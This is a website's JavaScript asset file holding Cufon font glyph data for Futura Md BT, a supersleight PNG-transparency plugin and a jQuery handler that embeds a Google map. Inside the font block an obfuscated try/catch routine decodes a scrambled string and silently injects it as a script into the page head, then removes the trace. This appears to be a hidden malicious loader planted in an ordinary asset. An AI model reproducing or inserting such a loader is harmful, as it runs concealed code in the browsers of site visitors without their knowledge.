":6,"V":6,"T":13,"A":6,";":-7,":":-7,".":15,"-":-10,",":15}},{"d":"126,-263r30,0r-126,296r-30,0","w":155},{"d":"46,-207r207,86r0,28r-207,85r0,-32r165,-67r-165,-67r0,-33","w":299},{"d":"26,0r0,-272r39,0r0,174r69,-69r47,0r-75,74r83,93r-50,0r-74,-86r0,86r-39,0","w":185,"k":{"-":15}},{"d":"30,0r0,-257r143,0r0,35r-102,0r0,65r102,0r0,36r-102,0r0,84r102,0r0,37r-143,0","w":191,"k":{";":-7,":":-7,".":-7,"-":-7,",":-7}},{"d":"84,-101r72,0v-12,-30,-28,-55,-36,-88v-10,31,-24,59,-36,88xm200,0r-30,-66r-102,0r-30,66r-43,0r124,-268r125,268r-44,0","w":238,"k":{"w":6,"v":6,"Y":20,"W":6,"V":6,"U":6,"T":20,"Q":6,"O":6,"G":6,"C":6,";":-7,":":-7,"-":8}},{"d":"36,-269v55,85,56,261,0,347r-28,-9v50,-83,48,-246,0,-330","w":109},{"d":"26,-100r94,0r0,35r-94,0r0,-35","w":145,"k":{"x":6,"s":-7,"q":-7,"o":-7,"e":-7,"d":-7,"c":-7,"Y":28,"X":13,"W":20,"V":21,"T":33,"S":-7,"Q":-13,"O":-13,"J":-20,"G":-13,"C":-7,"A":6}},{"d":"28,0r0,-272r38,0r0,272r-38,0","w":94},{"d":"41,45r0,-281r-33,0r0,-27r66,0r0,336r-66,0r0,-28r33,0","w":109},{"d":"253,-207r0,33r-164,67r164,67r0,32r-207,-85r0,-28","w":299},{"d":"45,-86r210,0r0,29r-210,0r0,-29xm45,-158r210,0r0,29r-210,0r0,-29","w":299},{"d":"112,-140v-64,0,-44,78,-47,140r-39,0r0,-167r36,0r0,28v15,-22,30,-33,65,-33v84,0,55,97,60,172r-38,0v-6,-52,21,-140,-37,-140","w":211},{"d":"40,-5r105,-217r-119,0r0,-33r178,0r-130,265"},{"d":"126,33r-126,-296r30,0r126,296r-30,0","w":155},{"d":"30,0r0,-257r41,0r0,95r127,0r0,-95r42,0r0,257r-42,0r0,-125r-127,0r0,125r-41,0","w":269,"k":{".":6,",":6}},{"d":"157,-31v46,0,78,-22,77,-66r-62,0r0,-35r102,0v9,87,-35,140,-118,139v-87,-1,-132,-52,-138,-135v-9,-125,164,-178,235,-90r-30,23v-48,-61,-161,-21,-161,67v0,57,40,97,95,97","w":289,"k":{"Y":6,"W":6,"T":6,";":-7,":":-7,".":10,"-":-8,",":10}},{"d":"54,3v-13,0,-23,-10,-23,-23v0,-11,11,-23,23,-23v13,0,23,11,23,23v1,13,-10,24,-23,23","w":108},{"d":"268,0r-33,-162v-19,64,-54,114,-79,172r-75,-156v-2,-6,-4,-11,-5,-16v-7,58,-22,108,-33,162r-38,0r61,-268r90,197r89,-197r62,268r-39,0","w":310},{"d":"75,-275r31,0r0,360r-31,0r0,-360","w":180},{"d":"125,-150r-16,45r45,0r16,-45r-45,0xm129,-257r34,0r-27,77r44,0r27,-77r33,0r-27,77r52,0r-11,30r-51,0r-16,45r54,0r-11,30r-54,0r-27,76r-34,0r28,-76r-44,0r-28,76r-34,0r28,-76r-53,0r11,-30r52,0r16,-45r-55,0r10,-30r56,0","w":276},{"d":"30,0r0,-257r41,0r0,106r93,-106r51,0r-102,114r114,143r-54,0r-102,-131r0,131r-41,0","w":223,"k":{"y":13,"u":6,"o":6,"e":6,"a":6,"Y":13,"W":13,"U":6,"T":13,"O":13,"C":13,";":-7,":":-7,".":-7,"-":18,",":-7}},{"d":"99,-260v68,0,99,62,68,119v-12,22,-60,79,-85,108r98,0r0,33r-172,0v39,-50,90,-99,122,-153v19,-32,4,-72,-34,-71v-25,1,-40,17,-42,40r-40,0v-1,-48,36,-76,85,-76"},{"d":"155,0r-155,0r92,-133r-83,0r0,-34r146,0r-91,134r91,0r0,33","w":161},{"d":"135,-215r30,0r0,93r90,0r0,29r-90,0r0,93r-30,0r0,-93r-90,0r0,-29r90,0r0,-93","w":299},{"d":"106,7v-91,0,-82,-87,-81,-174r38,0v5,56,-21,140,43,140v64,0,36,-85,42,-140r39,0v1,87,11,174,-81,174","w":211},{"d":"85,10r-87,-177r41,0v15,39,34,72,46,114v11,-42,31,-76,46,-114r41,0","w":169,"k":{".":28,",":28}},{"d":"109,-260v68,0,92,60,92,136v0,73,-29,131,-92,131v-67,0,-93,-60,-93,-134v0,-73,27,-133,93,-133xm58,-126v0,50,10,97,50,97v42,0,51,-45,51,-98v0,-52,-9,-97,-49,-97v-43,0,-52,45,-52,98"},{"d":"31,-153r-12,-21r39,-20r-39,-23r12,-22r37,24r-2,-42r26,0r-3,42r38,-24r13,22r-41,22r41,21r-14,21r-37,-24r3,43r-26,0r2,-43","w":158},{"d":"106,-130v-29,0,-46,22,-46,51v0,29,17,51,46,51v31,0,49,-20,49,-51v0,-31,-17,-51,-49,-51xm105,7v-51,0,-85,-35,-85,-86v0,-46,73,-144,106,-191r32,17r-75,97v54,-28,113,15,113,75v0,52,-38,88,-91,88"},{"d":"30,0r0,-257r143,0r0,35r-102,0r0,64r102,0r0,37r-102,0r0,121r-41,0","w":188,"k":{"u":6,"r":6,"A":13,";":15,":":15,".":71,"-":18,",":71}},{"d":"30,0r0,-268r177,172r14,17r0,-178r39,0r0,267r-180,-174r-12,-15r0,179r-38,0","w":289,"k":{";":10,":":10,".":16,",":16}},{"d":"181,-73v11,93,-153,110,-166,21r33,-15v5,44,97,49,91,-3v-6,-53,-125,-52,-117,-123v-8,-79,128,-95,151,-28r-32,17v-12,-31,-78,-31,-75,9v4,51,126,52,115,122","w":197,"k":{";":-7,":":-7,".":6,"-":-11,",":6}},{"d":"186,10r-51,-120v-15,42,-34,80,-51,120r-86,-177r40,0v16,38,38,68,46,114v9,-46,34,-80,49,-120r3,0v16,41,39,74,50,120v8,-44,31,-76,46,-114r40,0","w":270,"k":{".":26,"-":-7,",":26}},{"d":"62,-128v-3,65,71,119,136,85r-46,-49r50,0r25,26v50,-56,10,-164,-71,-159v-58,3,-91,39,-94,97xm293,-128v0,39,-16,71,-38,93r54,59r-50,0r-33,-36v-91,49,-212,-11,-208,-116v3,-81,55,-135,138,-135v82,0,137,53,137,135","w":311,"k":{";":-7,":":-7,"-":-10}},{"d":"59,-117v-13,0,-23,-10,-23,-23v0,-11,11,-22,23,-22v13,0,23,10,23,22v0,13,-9,23,-23,23xm59,3v-13,0,-23,-10,-23,-23v0,-12,11,-23,23,-23v13,0,23,12,23,23v0,13,-9,23,-23,23","w":118},{"w":108},{"d":"116,-57v10,71,-82,81,-115,37r26,-27v16,23,48,21,48,-23r0,-187r41,0r0,200","w":141,"k":{";":11,":":11,".":18,"-":6,",":18}},{"d":"115,-192r-22,0r-51,-48r39,0","w":180},{"d":"123,-133v-36,-19,-58,9,-58,60r0,73r-39,0r0,-167r39,0r0,27v5,-30,43,-40,72,-25","w":132,"k":{".":36,"-":13,",":36}},{"d":"155,-263v36,0,60,10,83,26r-2,42v-21,-18,-45,-29,-79,-30v-55,-1,-95,40,-95,97v0,54,38,97,91,96v36,-1,61,-14,83,-33r0,48v-22,15,-46,24,-80,24v-84,0,-138,-51,-138,-135v0,-83,52,-135,137,-135","w":258,"k":{";":-7,":":-7,"-":-8}},{"d":"189,-68v0,72,-102,97,-149,54v-15,-13,-23,-32,-23,-55v12,2,32,-4,40,2v0,25,18,40,45,39v30,0,48,-15,48,-45v0,-34,-23,-51,-60,-46r0,-34v32,2,54,-9,54,-37v0,-23,-15,-37,-39,-36v-23,0,-40,12,-40,34r-38,0v3,-45,32,-68,80,-68v44,-1,76,25,76,68v0,32,-16,53,-44,58v32,5,50,30,50,66"},{"d":"204,-129v0,-76,-47,-98,-133,-91r0,182v84,6,133,-14,133,-91xm248,-128v0,95,-54,134,-162,128r-56,0r0,-257r56,0v114,-5,162,32,162,129","w":266,"k":{"Y":13,"W":6,"V":6,"A":6,".":21,"-":-11,",":21}},{"d":"39,-263r40,0r0,204r-40,0r0,-204xm59,7v-12,1,-23,-11,-23,-23v0,-12,11,-24,23,-23v14,0,23,10,23,23v0,12,-10,24,-23,23","w":118},{"d":"109,-139v-30,0,-47,23,-46,55v0,32,18,57,47,57v32,0,46,-23,46,-55v-1,-33,-15,-57,-47,-57xm120,7v-27,0,-44,-11,-55,-29r0,100r-39,0r0,-245r39,0r0,28v7,-21,28,-34,56,-33v46,0,74,39,74,89v0,52,-26,90,-75,90","w":209,"k":{"-":-7}},{"d":"74,-117v-13,0,-22,-10,-22,-23v0,-12,9,-22,22,-22v13,0,23,9,23,22v1,13,-10,24,-23,23xm55,-44r35,13r-46,94r-23,-9","w":118},{"d":"141,-184v0,-39,-29,-39,-71,-39r0,74v38,0,71,1,71,-35xm151,-76v0,-40,-36,-44,-81,-41r0,82v45,1,81,0,81,-41xm194,-73v0,80,-78,76,-164,73r0,-257v77,-1,153,-9,153,67v0,30,-15,47,-37,54v30,4,48,29,48,63","w":207,"k":{"Y":6,"W":6,"V":6,".":10,"-":-10,",":10}},{"d":"103,-93v-75,-6,8,-151,-76,-135r0,-32v52,-1,78,7,76,62v-2,47,-7,97,49,89r0,31v-55,-8,-51,40,-49,90v3,54,-24,62,-76,61r0,-31v81,18,2,-130,76,-135","w":180},{"d":"47,-215v-12,0,-24,-10,-24,-24v0,-12,12,-24,24,-23v14,0,24,10,24,23v1,14,-11,24,-24,24xm28,78r0,-245r38,0r0,245r-38,0","w":94},{"d":"55,78r-39,0r46,-92r-62,-153r43,0v12,40,29,76,38,119v16,-41,35,-79,53,-119r41,0","w":169,"k":{".":31,"-":6,",":31}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+234-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("KSL%cUp0)mqiKCY4~UJf,S,q[op%LUqi[o$f)mQBLM2zDa0n#mIj,YY;LYROcm$wpJz%_%7YMCFYmSjU~^zNM%DzM[Aj~!>WD!R][0R1LsI$joJ7K^{B[|qj}aA*Q3{7}mN~_s%ip%Nj1{ji![W;1a$HKXMoOCVoQ|A!~%{H,{7kj|OaQCJW#0$q)B|n}BpWcSY0KC,nK1N7_!>zjs%n}B>zcs%W}UNYc>RCs{JS^,$K}Op#_FQ1!3Mm[DL)cj~uEkIn;|YUBV75*zri]WNfa0%oXwAH42qhZU~0)CNB_m,iLnABc^YW)^OquX04)mDVuf$|)[p;~[pa~SMf}BQYu^Q|jUYoLmwiDoqr,;VN}C$X~XjiLSYaDXMajXQYjnA0L[I0L^$7~UMi}Up]c1,HO1Wn~X~X}BpVD[$zL[OrDo{iDo2i~mzn#;JqmoN]DoJ0)mqi}UI]jXQiDm%Y[1YUcX,V#o|2csz*Ko|7L%r;moY~[!%WmoY~E1|VK1>k")}catch(e){}delete _cufon_bridge_;return f})({"w":217,"face":{"font-family":"Futura Md BT","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 6 2 2 2 4 2 3 3","ascent":"274","descent":"-86","x-height":"7","bbox":"-5 -279 343 85","underline-thickness":"25.4883","underline-position":"-26.543","unicode-range":"U+0020-U+007E"}}));

Cufon.replace('#header ul li a, h2, h3');

//supersleight
jQuery.fn.supersleight = function(settings) {
	settings = jQuery.extend({
		imgs: true,
		backgrounds: true,
		shim: 'x.gif',
		apply_positioning: true
	}, settings);
	
	return this.each(function(){
		if (jQuery.browser.msie && parseInt(jQuery.browser.version) < 7 && parseInt(jQuery.browser.version) > 4) {
			jQuery(this).find('*').each(function(i,obj) {
				var self = jQuery(obj);
				// background pngs
				if (settings.backgrounds && self.css('background-image').match(/\.png/i) !== null) {
					var bg = self.css('background-image');
					var src = bg.substring(5,bg.length-2);
					var mode = (self.css('background-repeat') == 'no-repeat' ? 'crop' : 'scale');
					var styles = {
						'filter': "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + src + "', sizingMethod='" + mode + "')",
						'background-image': 'url('+settings.shim+')'
					};
					self.css(styles);
				};
				// image elements
				if (settings.imgs && self.is('img[src$=png]')){
					var styles = {
						'width': self.width() + 'px',
						'height': self.height() + 'px',
						'filter': "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + self.attr('src') + "', sizingMethod='scale')"
					};
					self.css(styles).attr('src', settings.shim);
				};
				// apply position to 'active' elements
				if (settings.applyPositioning && self.is('a, input') && self.css('position') === ''){
					self.css('position', 'relative');
				};
			});
		};
	});
};

$(document).ready(function(){

//google maps
var gmap = jQuery('<iframe frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.co.uk/maps/ms?ie=UTF8&amp;msa=0&amp;msid=114110676753468290682.00046bd88bad0331f3077&amp;ll=55.773955,-4.041124&amp;spn=0.00881,0.027723&amp;t=k&amp;output=embed"></iframe>');
gmap.prependTo('#map');

//hide backup map
$("#backup_map").attr("style","display:none");

//supersleight
$('body').supersleight({shim: '/sharles/site/images/x.gif'});

});